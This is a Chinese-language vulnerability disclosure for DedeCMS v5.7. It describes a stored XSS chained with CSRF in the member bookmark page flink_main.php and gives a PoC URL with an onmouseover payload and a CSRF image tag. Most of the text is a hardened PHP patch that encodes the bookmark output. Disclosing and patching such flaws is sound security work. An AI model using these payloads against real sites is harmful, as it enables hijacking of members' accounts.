
DEDECMS v5.7(2013-06-07) xss+csrf 0day

书签管理存在存储型 XSS + CSRF：会员中心 member/flink_main.php 的 dopost=addnew 通过 GET 即可接受 title/url 并入库，而书签列表在输出时没有对这两个字段做 HTML 实体编码。单独的 XSS 只能打到自己的账户（self-XSS）；配合下面的 CSRF，攻击者可以让已登录会员在不知情的情况下向自己账户写入带 payload 的书签，之后会员一打开书签管理页就会触发。

http://localhost/dedecms/member/flink_main.php
 
 
xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'
 
CSRF:<img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">

临时修复方法（注意：下面只修补了 GetLinkList 的输出编码，也就是显示侧；从 PoC 看 addnew 写入端仅靠一个 GET 请求就能触发，仍需另行补上 CSRF token 校验或改为 POST，否则 CSRF 问题并未解决）:

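/**
 * Render the logged-in member's bookmark ("flink") list as editable rows.
 *
 * Hardened replacement for GetLinkList() in DedeCMS v5.7 member/flink_main.php.
 * The stored title/url are reflected into HTML attribute values, so each one is
 * HTML-entity-encoded at output time. Merely switching the attribute quoting
 * from ' to " (what the original "fix" did) is not sufficient: a stored `"`
 * still closes the attribute and allows an event-handler injection.
 * This only protects the display side; the addnew write path and its CSRF
 * exposure are not touched here.
 *
 * @param object $dsql  DedeCMS DB wrapper exposing SetQuery()/Execute()/
 *                      GetArray(); passed by reference to keep the original
 *                      signature.
 * @return void  Echoes HTML; prints "尚无任何链接" when the member has no rows.
 */
function GetLinkList(&$dsql)
{
    global $cfg_ml;

    // M_ID is the session member id and is expected to be numeric; the cast
    // guarantees the interpolated SQL fragment can only ever be an integer.
    $mid = (int)$cfg_ml->M_ID;
    $dsql->SetQuery("SELECT * FROM `#@__member_flink` WHERE mid='{$mid}' ORDER BY aid DESC");
    $dsql->Execute();

    $rendered = 0;
    while ($row = $dsql->GetArray()) {
        $rendered++;

        // aid feeds element ids and JS call arguments: force it to an int so it
        // can never carry markup or script into the onclick handlers.
        $aid = (int)$row['aid'];

        // Byte-wise escaping (single-byte charset) is deliberate: DedeCMS ships
        // both GBK and UTF-8 builds, and the five characters replaced here are
        // ASCII bytes in either encoding (never GBK trail bytes), so neither
        // charset is mangled or silently dropped as "invalid" by htmlspecialchars.
        $title = htmlspecialchars((string)$row['title'], ENT_QUOTES, 'ISO-8859-1');
        $url   = htmlspecialchars((string)$row['url'],   ENT_QUOTES, 'ISO-8859-1');

        // The original's inline "//干嘛要加单引号呢..." remark sat INSIDE this
        // string literal and would have been emitted as page text; dropped.
        echo "
<div class='item flink'>
  <div class='itemHead' >
    <div class='fRight'>
      <span class='itemDigg'><a href='#' onclick='UpdateType({$aid})'>[更新]</a></span>
      <span class='itemManage'><a href='#' onclick='DelType({$aid})'>[删除]</a></span>
    </div>
    <span class='itemTitle'>名称:<input name='title{$aid}' type='text' id='title{$aid}' value=\"{$title}\" class='intxt' /></span>
    <div class='mt5'>网址:<input name='url{$aid}' type='text' id='url{$aid}' value=\"{$url}\" class='intxt' /></div>
  </div>
</div>
<hr class='dotted' />";
    }

    if ($rendered === 0) {
        echo "尚无任何链接";
    }
}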